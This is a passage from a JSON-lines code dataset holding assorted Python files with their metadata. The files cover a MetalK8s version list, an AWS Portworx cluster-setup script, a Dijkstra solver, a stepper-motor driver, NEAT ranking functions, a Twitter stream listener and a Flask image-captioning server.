),\n Image(\n name=\"prometheus-operator\",\n version=\"v0.48.1\",\n digest=\"sha256:2e7b61c86ee8b0aef4f5da8b6a4e51ecef249c9ccf4a329c5aa0c81e3fd074c1\",\n ),\n # Local images\n Image(\n name=\"metalk8s-alert-logger\",\n version=VERSION,\n digest=None,\n ),\n Image(\n name=\"metalk8s-ui\",\n version=VERSION,\n digest=None,\n ),\n Image(\n name=\"shell-ui\",\n version=VERSION,\n digest=None,\n ),\n Image(\n name=\"metalk8s-utils\",\n version=VERSION,\n digest=None,\n ),\n Image(\n name=\"salt-master\",\n version=\"{version}-{build_id}\".format(\n version=SALT_VERSION, build_id=SALT_MASTER_BUILD_ID\n ),\n digest=None,\n ),\n Image(\n name=\"storage-operator\",\n version=\"latest\",\n digest=None,\n ),\n Image(\n name=\"loki\",\n version=\"2.2.1\",\n digest=\"sha256:01a278feebe94db18cd83e874db4d4a73713a62be6f3b1503ebe0100a6085c1f\",\n ),\n Image(\n name=\"fluent-bit-plugin-loki\",\n version=\"2.1.0-amd64\",\n digest=\"sha256:bedd17176ced6106404606d31f6d6bfa56b10d769074c0b624fb0bc470b081c2\",\n ),\n)\n\nCONTAINER_IMAGES_MAP = {image.name: image for image in CONTAINER_IMAGES}\n\n# }}}\n\n# Packages {{{\n\n\nclass PackageVersion:\n \"\"\"A package's authoritative version data.\n\n This class contains version information for a named package, and\n provides helper methods for formatting version/release data as well\n as version-enriched package name, for all supported OS families.\n \"\"\"\n\n def __init__(\n self,\n name: str,\n version: Optional[str] = None,\n release: Optional[str] = None,\n override: Optional[str] = None,\n ):\n \"\"\"Initializes a package version.\n\n Arguments:\n name: the name of the package\n version: the version of the package\n release: the release of the package\n \"\"\"\n self._name = name\n self._version = version\n self._release = release\n self._override = override\n\n name = property(operator.attrgetter(\"_name\"))\n version = property(operator.attrgetter(\"_version\"))\n release = property(operator.attrgetter(\"_release\"))\n override = property(operator.attrgetter(\"_override\"))\n\n @property\n def full_version(self) -> Optional[str]:\n \"\"\"The full package version string.\"\"\"\n full_version = None\n if self.version:\n full_version = self.version\n if self.release:\n full_version = \"{}-{}\".format(self.version, self.release)\n return full_version\n\n @property\n def rpm_full_name(self) -> str:\n \"\"\"The package's full name in RPM conventions.\"\"\"\n if self.full_version:\n return \"{}-{}\".format(self.name, self.full_version)\n return cast(str, self.name)\n\n\n# The authoritative list of packages required.\n#\n# Common packages are packages for which we need not care about OS-specific\n# divergences.\n#\n# In this case, either:\n# * the _latest_ version is good enough, and will be the one\n# selected by the package managers (so far: apt and yum).\n# * we have strict version requirements that span OS families, and the\n# version schemes _and_ package names do not diverge\n#\n# Strict version requirements are notably:\n# * kubelet and kubectl which _make_ the K8s version of the cluster\n# * salt-minion which _makes_ the Salt version of the cluster\n#\n# These common packages may be overridden by OS-specific packages if package\n# names or version conventions diverge.\n#\n# Packages that we build ourselves require a version and release as part of\n# their build process.\n\nPACKAGES: Dict[str, Any] = {\n \"common\": (\n # Pinned packages\n PackageVersion(name=\"kubectl\", version=K8S_VERSION),\n PackageVersion(name=\"kubelet\", version=K8S_VERSION),\n # Latest packages\n PackageVersion(name=\"coreutils\"),\n PackageVersion(name=\"cri-tools\"),\n PackageVersion(name=\"e2fsprogs\"),\n PackageVersion(name=\"ebtables\"),\n PackageVersion(name=\"ethtool\"),\n PackageVersion(name=\"gdisk\"),\n PackageVersion(name=\"genisoimage\"),\n PackageVersion(name=\"httpd-tools\"),\n PackageVersion(name=\"iproute\"),\n PackageVersion(name=\"iptables\"),\n PackageVersion(name=\"kubernetes-cni\"),\n PackageVersion(name=\"lvm2\"),\n PackageVersion(name=\"m2crypto\"),\n PackageVersion(name=\"python36-psutil\"),\n PackageVersion(name=\"python36-pyOpenSSL\"),\n PackageVersion(name=\"runc\"),\n PackageVersion(name=\"salt-minion\", version=SALT_VERSION),\n PackageVersion(name=\"socat\"),\n # TODO download built package dependencies\n PackageVersion(name=\"sos\", version=SOS_VERSION),\n PackageVersion(name=\"util-linux\"),\n PackageVersion(name=\"yum-utils\"),\n PackageVersion(name=\"xfsprogs\"),\n ),\n \"redhat\": {\n \"7\": (\n PackageVersion(\n name=\"calico-cni-plugin\",\n version=CALICO_VERSION,\n release=\"{0}.el7\".format(CALICO_RELEASE),\n ),\n PackageVersion(\n name=\"containerd\",\n version=CONTAINERD_VERSION,\n release=\"{0}.el7\".format(CONTAINERD_RELEASE),\n ),\n PackageVersion(name=\"container-selinux\"), # TODO #1710\n PackageVersion(\n name=\"metalk8s-sosreport\",\n version=SHORT_VERSION,\n release=\"{0}.el7\".format(SOSREPORT_RELEASE),\n ),\n PackageVersion(name=\"yum-plugin-versionlock\"),\n ),\n \"8\": (\n PackageVersion(\n name=\"calico-cni-plugin\",\n version=CALICO_VERSION,\n release=\"{0}.el8\".format(CALICO_RELEASE),\n ),\n PackageVersion(\n name=\"containerd\",\n version=CONTAINERD_VERSION,\n release=\"{0}.el8\".format(CONTAINERD_RELEASE),\n ),\n PackageVersion(name=\"container-selinux\"),\n PackageVersion(name=\"iptables-ebtables\", override=\"ebtables\"),\n PackageVersion(\n name=\"metalk8s-sosreport\",\n version=SHORT_VERSION,\n release=\"{0}.el8\".format(SOSREPORT_RELEASE),\n ),\n PackageVersion(name=\"python3-m2crypto\", override=\"m2crypto\"),\n PackageVersion(name=\"python3-dnf-plugin-versionlock\"),\n PackageVersion(name=\"python3-psutil\", override=\"python36-psutil\"),\n PackageVersion(name=\"python3-pyOpenSSL\", override=\"python36-pyOpenSSL\"),\n ),\n },\n}\n\n\ndef _list_pkgs_for_os_family(os_family: str) -> Dict[str, Tuple[PackageVersion, ...]]:\n \"\"\"List downloaded packages for a given OS family.\n\n Arguments:\n os_family: OS_family for which to list packages\n \"\"\"\n common_pkgs = PACKAGES[\"common\"]\n os_family_pkgs = PACKAGES.get(os_family)\n os_pkgs = {}\n\n if os_family_pkgs is None:\n raise Exception(\"No packages for OS family: {}\".format(os_family))\n\n for version, pkgs in os_family_pkgs.items():\n os_override_names = [pkg.override for pkg in pkgs if pkg.override is not None]\n\n # pylint: disable=cell-var-from-loop\n overridden = filter(\n lambda item: item.name not in os_override_names, common_pkgs\n )\n\n os_pkgs[version] = tuple(overridden) + os_family_pkgs[version]\n\n return os_pkgs\n\n\nREDHAT_PACKAGES = _list_pkgs_for_os_family(\"redhat\")\n\nREDHAT_PACKAGES_MAP = {\n version: {pkg.name: pkg for pkg in pkgs}\n for version, pkgs in REDHAT_PACKAGES.items()\n}\n\n# }}}\n\n# This variables holds the contents of the rendered\n# \"salt/metalk8s/versions.json\" file (useful in tests)\nSALT_VERSIONS_JSON = {\n \"kubernetes\": {\"version\": K8S_VERSION},\n \"packages\": {\n \"centos\": {\n version: {pkg.name: {\"version\": pkg.full_version} for pkg in pkgs}\n for version, pkgs in REDHAT_PACKAGES.items()\n },\n \"redhat\": {\n version: {pkg.name: {\"version\": pkg.full_version} for pkg in pkgs}\n for version, pkgs in REDHAT_PACKAGES.items()\n },\n },\n \"images\": {img.name: {\"version\": img.version} for img in CONTAINER_IMAGES},\n \"metalk8s\": {\"version\": VERSION},\n}\n","sub_path":"buildchain/buildchain/versions.py","file_name":"versions.py","file_ext":"py","file_size_in_byte":14988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"491249276","text":"#!/usr/bin/env python\n#\n# ready4px: Take a cluster that has been deployed through Tectonic,\n# and make it ready to run/deploy Portworx\n#\n# Inputs:\n# Environment:\n# AWS_CLUSTER : Corresponds to CLUSTER from Tectonic\n# AWS_SECRET_ACCESS_KEY, AWS_ACCESS_KEY_ID, \n# AWS_DEFAULT_REGION : Amazon credentials and region\n# AWS_VOL_TYPE: standard'|'io1'|'gp2'|'sc1'|'st1'\n# AWS_VOL_SIZE: in GBs\n# AWS_VOL_NAMES: /dev names for attach. Start with \"/dev/xvdd\", ...\n#\n# Assumptions:\n# The target cluster has a set of instances derived from two\n# auto-scaling groups called $AWS_CLUSTER-masters and $AWS_CLUSTER-workers\n# This happens to be the structure for Tectonic.\n# This may apply to other targets.\n# \n\nimport os\nimport sys\nimport time\nimport boto3\nfrom pprint import pprint\nfrom botocore.exceptions import ClientError\n\n# PX-ports, needed open between workers\npxports = [ 9001, 9002, 9003, 9010, 9012, 9014 ]\nenvars = [ \"AWS_SECRET_ACCESS_KEY\", \"AWS_ACCESS_KEY_ID\", \"AWS_DEFAULT_REGION\",\n \"AWS_CLUSTER\", \"AWS_VOL_TYPE\", \"AWS_VOL_SIZE\", \"AWS_VOL_NAMES\" ]\n\n\ndef check_prereqs():\n for e in envars:\n # if not os.getenv(e): \n if not e in os.environ:\n print (\"FATAL: {} is not defined\".format(e))\n sys.exit(-1)\n\n#\n# asg_to_iids: Given an auto-scaling group name, return the corresponding list of instanceIDs\n#\ndef asg_to_iids(asgname):\n\n asclient = boto3.client('autoscaling')\n\n # Array of instance IDs\n iids = []\n\n asgs = asclient.describe_auto_scaling_groups(\n AutoScalingGroupNames=[\n asgname\n ]\n )\n \n for a in asgs['AutoScalingGroups']:\n for ids in a['Instances']:\n iids.append(ids['InstanceId'])\n \n return iids\n\n\ndef list_instances(grp, iids):\n for i in iids:\n print ('{} : {}'.format(grp,i))\n \ndef pxify_masters(ec2, master_sg):\n\n print (\"px-ifying \", master_sg)\n msg = ec2.SecurityGroup(master_sg)\n try:\n msg.authorize_ingress( IpProtocol=\"tcp\", CidrIp=\"0.0.0.0/0\", FromPort=30062, ToPort=30062 )\n except ClientError as e:\n if e.response['Error']['Code'] == 'EntityAlreadyExists':\n print (\"Object already exists\")\n else:\n print (\"Unexpected error: %s\" % e)\n\n\n#\n# Add ports to the workers Security Group\n#\ndef pxify_workers_sg (ec2, worker_sg, wvpc):\n\n print (\"px-ifying security group\", worker_sg)\n wsg = ec2.SecurityGroup(worker_sg)\n\n for p in pxports:\n try:\n wsg.authorize_ingress( IpPermissions=[{'FromPort': p, 'IpProtocol': 'tcp', 'ToPort': p,\n 'UserIdGroupPairs' : [{'GroupId': worker_sg, 'VpcId' : wvpc}]}])\n print (\"Added port {} to security_group {}\".format(p, worker_sg))\n except ClientError as e:\n if e.response['Error']['Code'] == 'EntityAlreadyExists':\n print (\"Object already exists\")\n else:\n print (\"Unexpected error: %s\" % e)\n\ndef waitfor_vol (ec2r, volid):\n while True:\n if ec2r.Volume(volid).state == \"available\":\n return\n else:\n print (\" Waiting for \", volid)\n time.sleep(2)\n#\n# Add and attach volumes to the workers instances\n# \ndef pxify_workers_vols (ec2c, ec2r, workers):\n\n vol_size = os.getenv(\"AWS_VOL_SIZE\")\n vol_type = os.getenv(\"AWS_VOL_TYPE\")\n vol_names = os.environ.get(\"AWS_VOL_NAMES\").split(\" \")\n vol_region = os.getenv(\"AWS_DEFAULT_REGION\")\n \n for w in workers:\n print (\"Creating volumes for instance : \", w)\n az = ec2r.Instance(w).placement['AvailabilityZone']\n print (\" {} has az {}\".format(w, az))\n # Count the number of disks per instance. Make sure there aren't more than there should be\n # nblkdevs = len(ec2r.Instance(w).block_device_mappings)\n # print (\"Instance {} has {} devices attached\".format(w, nblkdevs))\n \n for name in vol_names:\n try:\n vol = ec2c.create_volume ( AvailabilityZone=az, Size=int(vol_size), VolumeType=vol_type)\n print (\" Created \", vol['VolumeId'])\n waitfor_vol (ec2r, vol['VolumeId'])\n try:\n ec2r.Instance(w).attach_volume( Device=name, VolumeId=vol['VolumeId'])\n print (\" Attached {} to {}\".format(vol['VolumeId'], w))\n except ClientError as e:\n print (\" Volume attach error: %s\" % e)\n \n except ClientError as e:\n print (\" Volume create error: %s\" % e)\n\n\n\nif __name__ == \"__main__\":\n\n check_prereqs()\n\n masters_asg = '{}-{}'.format(os.getenv(\"AWS_CLUSTER\"),\"masters\")\n workers_asg = '{}-{}'.format(os.getenv(\"AWS_CLUSTER\"),\"workers\")\n \n masters = asg_to_iids(masters_asg)\n workers = asg_to_iids(workers_asg)\n \n if not masters or not workers:\n print(\"No instances listed for cluster : \", os.getenv(\"AWS_CLUSTER\"))\n sys.exit(-1)\n\n ec2c = boto3.client('ec2')\n ec2r = boto3.resource('ec2')\n\n list_instances(masters_asg, masters)\n master_sg = ec2r.Instance(masters[0]).security_groups[0]['GroupId']\n print (\"Masters Security Group = \", master_sg)\n pxify_masters(ec2r, master_sg)\n \n list_instances(workers_asg, workers)\n worker_sg = ec2r.Instance(workers[0]).security_groups[0]['GroupId']\n print (\"Workers Security Group = \", worker_sg)\n worker_vpc = ec2r.Instance(workers[0]).vpc_id\n pxify_workers_sg (ec2r, worker_sg, worker_vpc)\n\n pxify_workers_vols (ec2c, ec2r, workers)\n","sub_path":"aws/scripts/rpx.py","file_name":"rpx.py","file_ext":"py","file_size_in_byte":5701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"449365428","text":"import json\nfrom django.shortcuts import *\nfrom django.template import RequestContext\nfrom linki.forms import *\n\ndef advert(request):\n if request.method == \"POST\":\n form = AdvertForm(request.POST)\n\n message = 'something wrong!'\n if(form.is_valid()):\n print(request.POST['title'])\n message = request.POST['title']\n\n return HttpResponse(json.dumps({'message': message}))\n\n return render_to_response('contact/advert.html',\n {'form':AdvertForm()}, RequestContext(request))","sub_path":"blog/tview.py","file_name":"tview.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"189168558","text":"from heapq import *\r\nN,M,C=map(int,input().split())\r\npath=[[] for _ in range(N+1)]\r\nfor _ in range(M):\r\n X,Y,Z=map(int,input().split())\r\n path[X].append((Z,Y))\r\ndistance=[654321]*(N+1)\r\nq=[]\r\nheapify(q)\r\nheappush(q,(0,C))\r\ndistance[C]=0\r\nwhile q:\r\n dist,now=heappop(q)\r\n if distance[now] 0.1:\n self.mStep_wait = 0.1\n else:\n self.mStep_wait = wait\n\n \"\"\"CWに1Step移動する\"\"\"\n def Step_CW(self, step, wait):\n self.SetWaitTime(wait)\n for i in range(0, step):\n if self.mNSeq >= 7:\n self.SetPinsVoltage(0)\n else:\n self.SetPinsVoltage(self.mNSeq+1)\n sleep(self.mStep_wait)\n\n \"\"\"CCWに1Step移動する\"\"\"\n def Step_CCW(self, step, wait):\n self.SetWaitTime(wait)\n for i in range(0, step):\n if self.mNSeq <= 0:\n self.SetPinsVoltage(7)\n else:\n self.SetPinsVoltage(self.mNSeq-1)\n sleep(self.mStep_wait)\n\n \"\"\"終了処理\"\"\"\n def Cleanup(self):\n GPIO.cleanup()\n\n\"\"\"メイン関数\"\"\"\nif __name__ == '__main__':\n StepMoter = C28BYJ48(IN1=4, IN2=17, IN3=27, IN4=22)\n #Main loop\n try:\n while True:\n StepMoter.Step_CW(4096,0.001)\n sleep(0.5)\n StepMoter.Step_CCW(4096,0.001)\n sleep(0.5)\n\n except KeyboardInterrupt : #Ctl+Cが押されたらループを終了\n print(\"\\nCtl+C\")\n except Exception as e:\n print(str(e))\n finally:\n StepMoter.Cleanup()\n print(\"\\nexit program\")\n","sub_path":"c28byj48.py","file_name":"c28byj48.py","file_ext":"py","file_size_in_byte":2433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"139780069","text":"'''\nCreated on Nov 22, 2015\n\n@author: soroosh\n'''\nimport os\nimport numpy as np\nimport random\n\nGroundTruthHolder = []\n\ndef readAllFileNames(destdir, extension):\n return [f for f in os.listdir(destdir) if (extension == '*' or f.endswith('.' + extension))]\n\n\ndef groundTruthValue(configObject ,filename, req_millisecond):\n '''\n Returns the label of a frame based on ground truth\n \n \n :param configObject:\n :param filename:\n :param req_millisecond:\n '''\n if len(GroundTruthHolder) == 0:\n readGroundTruth(configObject)\n \n fileobject = [x for x in GroundTruthHolder if x['Filename'] == filename]\n \n if len(fileobject) == 0:\n raise Exception('groundtruth data not found')\n \n if fileobject[0]['Jump #1'] == '' and fileobject[0]['Jump #2'] == '':\n return 0;\n \n \n min1 = fileobject[0]['Jump #1'].split(':')[0]\n sec1 = fileobject[0]['Jump #1'].split(':')[1]\n #check if it is in the first jump\n _jump1_msecs = (int(min1) * 60 + int(sec1)) * 1000\n \n if req_millisecond + 1000 >= _jump1_msecs and req_millisecond <=_jump1_msecs + 4000:\n return 1\n \n \n if fileobject[0]['Jump #2'] is not '':\n min2 = fileobject[0]['Jump #2'].split(':')[0]\n sec2 = fileobject[0]['Jump #2'].split(':')[1]\n _jump2_msecs = (int(min2) * 60 + int(sec2)) * 1000\n if req_millisecond + 1000 >= _jump2_msecs and req_millisecond <=_jump2_msecs + 4000:\n return 1\n \n return 0\n\ndef readGroundTruth(configObject):\n '''\n Reads Ground Truth File\n \n \n :param configObject:\n '''\n f = open(configObject['ground-truth'], 'r')\n \n for line in f.readlines():\n _splitted = line.strip().split(',')\n \n if len(_splitted) < 7:\n continue\n \n GroundTruthHolder.append({'#' : _splitted[0], 'Filename' : _splitted[1], 'Hands' : _splitted[2], 'Feet' : _splitted[3], 'Empty' : _splitted[4], 'Jump #1' : _splitted[5], 'Jump #2' : _splitted[6]})\n \n \n f.close()\n \n \ndef SplitToSetLabel( instances):\n _outputInstances = [x[1:] for x in instances]\n _outputLabels = [int(x[0]) for x in instances]\n return (np.asarray(_outputInstances), np.asarray(_outputLabels))\n \ndef ShakeData(instances):\n random.shuffle(instances)\n return np.asarray(instances)","sub_path":"SimilarityModeling1/src/Feaures/Helper.py","file_name":"Helper.py","file_ext":"py","file_size_in_byte":2353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"510501433","text":"def checkColumnas(sudoku):\n fila1 = sudoku[0]\n nfilas = len(sudoku) - 1\n for numero in fila1:\n indexfila = 0\n# posicion que ocupa el numero en las diferentes\n#filas, si es igual entre filas, esta mal\n while indexfila < nfilas:\n indexfilasiguiente = indexfila + 1\n try:\n posnumerofilasiguiente = sudoku[indexfilasiguiente].index(numero)\n except ValueError:\n return False\n else:\n if posnumerofilasiguiente == fila1.index(numero):\n return False\n else:\n indexfila += 1\n return True\n\n\n\nif __name__ == \"__main__\":\n \n test = [[1, 2, 3],\n [2, 3, 1],\n [3, 1, 2]]\n \n test2 = [[1,2,3,4],\n [2,3,1,3],\n [3,1,2,3],\n [4,4,4,2]]\n\n assert checkColumnas(test) \n assert checkColumnas(test2) == False","sub_path":"checkcolumnas.py","file_name":"checkcolumnas.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"458061839","text":"import math\nimport operator\nimport sys\n\nfrom src.Config import Config\n\n\"\"\"a collection of the population ranking functions which were tested\"\"\"\n\ndef single_objective_rank(individuals):\n individuals.sort(key=lambda indv: (0 if not indv.fitness_values else indv.fitness_values[0]), reverse=True)\n for i, individual in enumerate(individuals):\n individual.rank = i + 1\n\n\ndef cdn_pareto_front(individuals):\n individuals.sort(key=lambda indv: indv.fitness_values[0], reverse=True)\n\n pf = [individuals[0]] # pareto front populated with best individual in primary objective\n\n for indv in individuals[1:]:\n if Config.second_objective_comparator(indv.fitness_values[1], pf[-1].fitness_values[1]):\n pf.append(indv)\n\n return pf\n\n\ndef cdn_rank(individuals):\n ranked_individuals = []\n fronts = []\n remaining_individuals = set(individuals)\n\n while len(remaining_individuals) > 0:\n pf = cdn_pareto_front(list(remaining_individuals))\n fronts.append(pf)\n remaining_individuals = remaining_individuals - set(pf)\n ranked_individuals.extend(pf)\n\n for i, indv in enumerate(ranked_individuals):\n indv.rank = i + 1\n return fronts\n\n\ndef nsga_rank(individuals):\n fronts = general_pareto_sorting(individuals)\n\n rank = 1\n\n for front in fronts:\n # rank is firstly based on which front the indv is in\n distances = {}\n for objective in range(len(individuals[0].fitness_values)):\n # estimate density by averaging the two nearest along each objective axis, then combining each distance\n objective_sorted = sorted(front, key=lambda x: x.fitness_values[objective])\n for i, indv in enumerate(objective_sorted):\n if i == 0 or i == len(objective_sorted) - 1:\n distance = sys.maxsize\n else:\n distance = (abs(\n objective_sorted[i].fitness_values[objective] - objective_sorted[i + 1].fitness_values[\n objective]) + abs(\n objective_sorted[i].fitness_values[objective] - objective_sorted[i - 1].fitness_values[\n objective])) / 2\n distance = math.pow(distance, 2)\n\n if objective == 0:\n distances[indv] = []\n distances[indv].append(distance)\n\n distance_sorted = sorted(front, key=lambda x: sum(distances[x]), reverse=True)\n for indv in distance_sorted:\n indv.rank = rank\n rank += 1\n\n\ndef general_pareto_sorting(individuals, return_pareto_front_only=False):\n \"\"\"takes in a list of individuals and returns a list of fronts, each being a list of individuals\"\"\"\n fronts = [[]]\n dominations = {}\n domination_counts = {}\n for indv in individuals:\n dominated_count = 0\n domination_by_indv = []\n for comparitor in individuals:\n if indv == comparitor:\n continue\n if check_domination(indv, comparitor):\n domination_by_indv.append(comparitor)\n elif check_domination(comparitor, indv):\n dominated_count += 1\n if dominated_count == 0:\n fronts[0].append(indv)\n\n dominations[indv] = domination_by_indv\n domination_counts[indv] = dominated_count\n\n if return_pareto_front_only:\n return fronts[0]\n\n front_number = 0\n while True:\n next_front = set()\n for leader in fronts[front_number]:\n for dominated_individual in dominations[leader]:\n domination_counts[dominated_individual] -= 1\n if domination_counts[dominated_individual] == 0:\n next_front.add(dominated_individual)\n\n if len(next_front) == 0:\n break\n fronts.append(next_front)\n front_number += 1\n\n return fronts\n\n\ndef check_domination(domination_candidate, comparitor):\n \"\"\"checks if the domination candidate dominates the comparitor\"\"\"\n for i in range(len(domination_candidate.fitness_values)):\n if i == 0:\n comparison = operator.gt # objective 0 is always maximised\n else:\n comparison = Config.second_objective_comparator if i == 1 else Config.third_objective_comparator\n\n if comparison(comparitor.fitness_values[i], domination_candidate.fitness_values[i]):\n return False\n return True\n\n\nif __name__ == \"__main__\":\n import matplotlib.pyplot as plt\n from src.NEAT.Genome import Genome\n import random\n\n fake_individuals = []\n for i in range(100):\n fake_individuals.append(Genome([], []))\n fake_individuals[-1].fitness_values = [random.random(), random.random()]\n fronts = general_pareto_sorting(fake_individuals)\n # print(len(fronts))\n for front in fronts:\n sorted_front = sorted(front, key=lambda indv: indv.fitness_values[0])\n x = [indv.fitness_values[0] for indv in sorted_front]\n y = [indv.fitness_values[1] for indv in sorted_front]\n plt.plot(x, y)\n plt.show()\n","sub_path":"src/NEAT/PopulationRanking.py","file_name":"PopulationRanking.py","file_ext":"py","file_size_in_byte":5092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"31470047","text":"import time\nimport json\nfrom tweepy.streaming import StreamListener\nfrom solariat_bottle.daemons.twitter.stream.eventlog import InMemEvents, Events\nfrom solariat_bottle.settings import LOGGER\nfrom solariat.utils.timeslot import now\n\nsleep = time.sleep\n\n\nclass BaseListener(StreamListener):\n\n def __init__(self, stream, stream_manager, db=None, api=None, logger=LOGGER):\n\n super(BaseListener, self).__init__(api=api)\n self.logger = logger\n self.last_keep_alive = None\n self.last_event = None\n self.last_status_id = None\n self.stream = stream\n self.stream_id = stream.stream_id\n self.auth = stream.auth_params\n\n self.db = db or InMemEvents()\n self.stream_manager = stream_manager\n self.bot = stream_manager.bot_instance\n\n def on_message(self, message):\n \"\"\"Override in subclasses\"\"\"\n raise NotImplementedError(\"on_message() undefined\")\n\n def on_data(self, raw_data):\n \"\"\"Called when raw data is received from connection.\n\n Override this method if you wish to manually handle\n the stream data. Return False to stop stream and close connection.\n \"\"\"\n try:\n data = json.loads(raw_data)\n except ValueError:\n self.log_event(\"on_data() can't decode json: %s\" % raw_data)\n return\n finally:\n self.last_keep_alive = now()\n\n if self.on_message(data):\n return\n # twitter warning events\n elif 'limit' in data:\n if self.on_limit(data['limit']) is False:\n return False\n elif 'disconnect' in data:\n if self.on_disconnect(data['disconnect']) is False:\n return False\n elif 'warning' in data:\n # warnings can be received only with stall_warnings=True\n if self.on_warning(data['warning']) is False:\n return False\n else:\n self.log_event(\"unknown message type: \" + str(raw_data))\n\n def log_event(self, msg, db_log=True):\n self.logger.info(u\"[%s] %s\" % (self.stream_id, msg))\n if db_log:\n self.db.add_message(self.stream_id, msg, now())\n\n def on_connect(self):\n \"\"\"Emitted by Stream when connected successfully\"\"\"\n self.log_event('connect')\n self.last_keep_alive = now()\n self.set_event(Events.EVENT_ONLINE)\n\n def keep_alive(self):\n \"\"\"Emitted by Stream when twitter sends \\r\\n bytes or message chunks\"\"\"\n self.last_keep_alive = now()\n\n def on_error(self, status):\n \"\"\"Emitted by Stream when http status != 200.\n Return False to break Stream reconnect loop.\n For 420 (rate limit) and 503 status codes let\n tweepy use back off reconnecting strategy.\"\"\"\n self.log_event('http error %s' % status)\n self.set_event(Events.EVENT_OFFLINE)\n if status not in (420, 503):\n return False\n\n def on_exception(self, exception):\n \"\"\"Emitted by Stream on exceptions during connection\n or stream data handling\"\"\"\n self.logger.warning(u\"[%s]\", self.stream_id, exc_info=True)\n self.log_event(u'exception %s' % exception)\n self.reconnect(exc=exception)\n\n def on_timeout(self):\n \"\"\"Emitted by Stream on network connection timeout\"\"\"\n self.log_event('timeout')\n # no need to reconnect - Stream will snooze connection automatically\n self.set_event(Events.EVENT_OFFLINE)\n return True\n\n def on_closed(self):\n \"\"\"Emitted by Stream when connection suddenly closed by twitter\"\"\"\n self.log_event('closed')\n self.reconnect()\n\n def on_limit(self, track):\n \"\"\"Filtered stream has matched more Tweets\n than its current rate limit allows to be delivered.\n https://dev.twitter.com/streaming/overview/messages-types#limit_notices\n Emitted from self.on_data()\n \"\"\"\n self.log_event('limit %s' % track)\n\n def set_event(self, event_type):\n # when stream killed due to channel deactivation\n # SUSPEND is set just before OFFLINE - keep only first\n already_set = (self.last_event and self.last_keep_alive and\n self.last_event[0] == Events.EVENT_SUSPEND and\n event_type == Events.EVENT_OFFLINE and\n (self.last_event[2] - self.last_keep_alive).total_seconds() <= 1.0)\n # print('ALREADY SET', already_set, event_type)\n if event_type is not None and not already_set:\n self.last_event = (event_type, self.stream_id, self.last_keep_alive, self.last_status_id)\n # print('ADD event', self.last_event)\n self.db.add_event(*self.last_event)\n\n def reconnect(self, exc=None):\n self.log_event('reconnect')\n self.set_event(Events.EVENT_OFFLINE)\n self.stream_manager.on_disconnect(self.stream_id, exc=exc)\n\n def on_disconnect(self, notice):\n \"\"\"https://dev.twitter.com/streaming/overview/messages-types#disconnect_messages\n Emitted from self.on_data()\n \"\"\"\n self.log_event('disconnect %s' % (notice,))\n self.reconnect() # let manager restart stream\n return False\n\n def on_warning(self, notice):\n \"\"\"https://dev.twitter.com/streaming/overview/messages-types#stall_warnings\n Emitted from self.on_data()\n \"\"\"\n self.log_event('warning %s' % notice)\n\n def on_kill(self):\n \"\"\"Stop event from bot\"\"\"\n self.set_event(Events.EVENT_OFFLINE)\n","sub_path":"daemons/twitter/stream/base/listener.py","file_name":"listener.py","file_ext":"py","file_size_in_byte":5532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"198112600","text":"\nfrom flask import Flask, request, Response\nimport jsonpickle\nimport numpy as np\nimport cv2\nimport fastai.vision as fv\nimport torch\nimport json \n\nfrom caption import caption_image_beam_search \n\n\n# Initialize the Flask application\napp = Flask(__name__)\n \n\nclass AIModel:\n def __init__(self):\n # load room type model \n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n self.learn = fv.load_learner('./models', file='resnet-roomtype.pkl')\n self.learn.model = self.learn.model.module \n\n # Load caption model\n checkpoint = torch.load('BEST_checkpoint_coco_5_cap_per_img_5_min_word_freq.pth.tar', map_location=str(device))\n self.decoder = checkpoint['decoder']\n self.decoder = self.decoder.to(device)\n self.decoder.eval()\n self.encoder = checkpoint['encoder']\n self.encoder = self.encoder.to(device)\n self.encoder.eval()\n\n # Load word map (word2ix)\n with open('WORDMAP_coco_5_cap_per_img_5_min_word_freq.json', 'r') as j:\n self.word_map = json.load(j)\n self.rev_word_map = {v: k for k, v in self.word_map.items()} # ix2word\n\n def getRoomType(self, img_path): \n img = fv.open_image(img_path)\n predict_class,predict_idx,predict_values = self.learn.predict(img)\n return predict_class, predict_idx, predict_values \n\n\n def getDescription(self, img_path, beam_size=5): \n # Encode, decode with attention and beam search\n seq, alphas = caption_image_beam_search(self.encoder, self.decoder, img_path, self.word_map, beam_size)\n alphas = torch.FloatTensor(alphas)\n #Final predicted sentence\n words = [self.rev_word_map[ind] for ind in seq]\n return words \n\n\n\naiModel = AIModel()\n\n\n# route http posts to this method\n@app.route('/api/get_room_type', methods=['POST'])\ndef get_room_type():\n r = request\n # convert string of image data to uint8\n nparr = np.fromstring(r.data, np.uint8)\n # decode image\n img = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n\n TEMP_IMAGE_PATH = 'temp.jpg'\n cv2.imwrite(TEMP_IMAGE_PATH, img)\n\n predict_class, predict_idx, predict_values = aiModel.getRoomType(TEMP_IMAGE_PATH)\n confdience = predict_values[predict_idx.item()].item()\n \n # build a response dict to send back to client\n strClass = f'{predict_class}'\n response = {\"class\":strClass,\"confdience\":confdience}\n # encode response using jsonpickle\n response_pickled = jsonpickle.encode(response)\n\n return Response(response=response_pickled, status=200, mimetype=\"application/json\")\n\n\n# route http posts to this method\n@app.route('/api/get_description', methods=['POST'])\ndef get_description():\n r = request\n # convert string of image data to uint8\n nparr = np.fromstring(r.data, np.uint8)\n # decode image\n img = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n\n TEMP_IMAGE_PATH = 'temp.jpg'\n cv2.imwrite(TEMP_IMAGE_PATH, img)\n\n description = aiModel.getDescription(TEMP_IMAGE_PATH)\n description = description[1:-1]\n description = ' '.join(description)\n\n # build a response dict to send back to 